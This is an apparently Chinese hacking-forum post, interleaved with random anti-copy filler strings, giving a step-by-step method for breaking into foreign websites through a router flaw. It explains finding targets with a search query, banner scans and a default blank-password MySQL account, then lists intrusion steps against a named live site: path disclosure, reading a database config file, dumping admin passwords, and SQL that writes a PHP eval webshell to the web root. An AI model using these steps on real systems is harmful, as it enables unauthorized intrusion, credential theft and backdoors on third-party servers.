中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
( K9 a; w: Y: q; t0 |! f
+ p! F. _; x. b* z5 l
1:google搜索'Raonet Subscriber Ethernet Router'
1 S/ F5 Z6 O1 T0 [8 _! k2 Y
: |& |5 h z! Y
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
6 ~2 e8 B' [8 L; o0 L- |
/ K. h9 {, g5 D: M. N: R( H, L4 Z6 c
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, a$ s% C* Y8 B/ _% `/ G+ Y0 ~
0 q) ]: m L Y" Y
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
% Z1 X+ }8 x2 o! { H) S) L
8 z8 g& C$ K! J8 A4 y0 I, G' U! N+ I
5 ], T \% t: ?, B' T
, I9 j5 S2 D K
入侵步骤:
) s7 g& G* A( |6 [4 b, y* x1 w# L
b7 C3 E% p1 U9 x
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
3 A- C8 }5 c! V# @: y9 K g( l
8 p. B, t3 O5 \& P- x; i
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
, p; N+ I0 G& n. {7 x: ?" L
3:得到密码后连接,查看GUI管理密码:
+ n ^, C6 W4 y; T! n
use ser_500
& q: Q3 T$ H3 |) k3 T5 b
select id,passwd from user;
' z8 j' Z0 n" d$ }. v
4:通过数据库写入webshell,执行命令:
8 W& b& X" D- T! V
use mysql;
, a& G2 n H0 m% g) h9 P
create table ok(cmd TEXT);
; X& e4 P2 t- l' J. S
insert into ok values("<?php @eval($_POST[cmd])?>");
, U7 O( y8 j& L# q" a
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
6 |/ `) a" v9 R8 b6 ~. x
drop table ok;
r/ O/ O1 W: \
( O+ d6 d R) m# E, D! }
5:连接后门shell.php
, Z! A0 f: z) @) q& Q
; C# I# t4 C0 X3 C
6. 搞定!
: Q- u! W5 P: R
. c6 O2 C+ U6 [! q! F1 s& @2 n4 C
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2